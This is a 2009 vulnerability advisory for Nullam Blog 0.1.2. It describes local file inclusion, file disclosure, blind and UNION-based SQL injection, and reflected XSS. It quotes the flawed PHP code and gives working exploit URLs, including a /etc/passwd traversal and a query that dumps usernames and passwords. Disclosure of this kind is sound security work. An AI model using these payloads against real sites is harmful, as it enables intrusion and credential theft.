Nullam Blog Multiple Remote Vulnerabilities

2009.10.12
Credit: Salvatore Fresta
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-3664 | CVE-2009-3665 | CVE-2009-3666
CWE: CWE-22
CWE-89
CWE-79

-- Salvatore Fresta aka drosophila CWNP444351 ******** Salvatore "drosophila" Fresta ******** [+] Application: Nullam Blog [+] Version: 0.1.2 [+] Website: http://nullam.net/ [+] Bugs: [A] Local File Inclusion [B] File Disclosure [C] Multiple Blind SQL Injection [D] SQL Injection [E] Reflected XSS [+] Exploitation: Remote [+] Date: 10 Sep 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs The following flaws are tested on version 0.1.2. Other versions may also be affected. - [A] Local File Inclusion [-] Risk: high [-] File affected: index.php This bug allows a guest to include a local file. ... $static = false; if(!isset($_GET['p'])) { $include = "./pages/news.php"; } else { $include = "./pages/" . $_GET['p'] . ".php"; } ... if(!$static) { include($include); } ... - [B] File Disclosure [-] Risk: medium [-] File affected: index.php This bug allows a guest to view the content of a local file. ... if(isset($_GET['s'])) { $static = true; $include = "./pages/custom/" . $_GET['s'] . ".html"; } ... if(!$static) { include($include); } else { $pageSmarty = new Smarty; $pageSmarty->assign('html', file_get_contents($include)); ... - [C] Blind SQL Injection [-] Risk: medium [-] File affected: news.php, register.php These bugs allows a guest to inject SQL statements into the affected queries. - [D] SQL Injection [-] Risk: high [-] File affected: register.php This bug allows a guest to inject SQL statements into the affected query. ... $result = mysql_query(sprintf("SELECT `uname`,`verified` FROM `users` WHERE `verifyHash`='%s' LIMIT 1;", $_GET['v'])) or die(mysql_error()); if(mysql_numrows($result) != 1) { $msg = "Invalid verification hash! If you followed the link you received in your email please contact an admin and request a new verification email."; } else { $msg = "User " . mysql_result($result, 0, 'uname') . " successfully verified! you may now login using the form on the main page!"; } ... *************************************************** [+] Code - [A] Local File Inclusion http://site/path/index.php?p=../../../../../../etc/passwd%00 - [B] File Disclosure http://site/path/index.php?s=../../../../../../../etc/passwd%00 - [C] Multiple Blind SQL Injection http://site/path/index.php?y=1&i=%25-1%25' OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23 http://site/path/index.php?p=register&v=1' OR IF(ASCII(CHAR(97)) = 97,BENCHMARK(10000000000,null),null)%23 - [D] SQL Injection http://site/path/index.php?p=register&v=-1' UNION ALL SELECT GROUP_CONCAT(uname,0x3a,passwd),2 FROM users%23 - [E] Reflected XSS http://site/path/index.php?p=error&e=<script>alert('XSS');</script> *************************************************** [+] Fix No fix. ***************************************************

References:

http://xforce.iss.net/xforce/xfdb/53217
http://www.securityfocus.com/archive/1/archive/1/506380/100/0/threaded
http://www.osvdb.org/57919
http://www.milw0rm.com/exploits/9625
http://secunia.com/advisories/36648


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top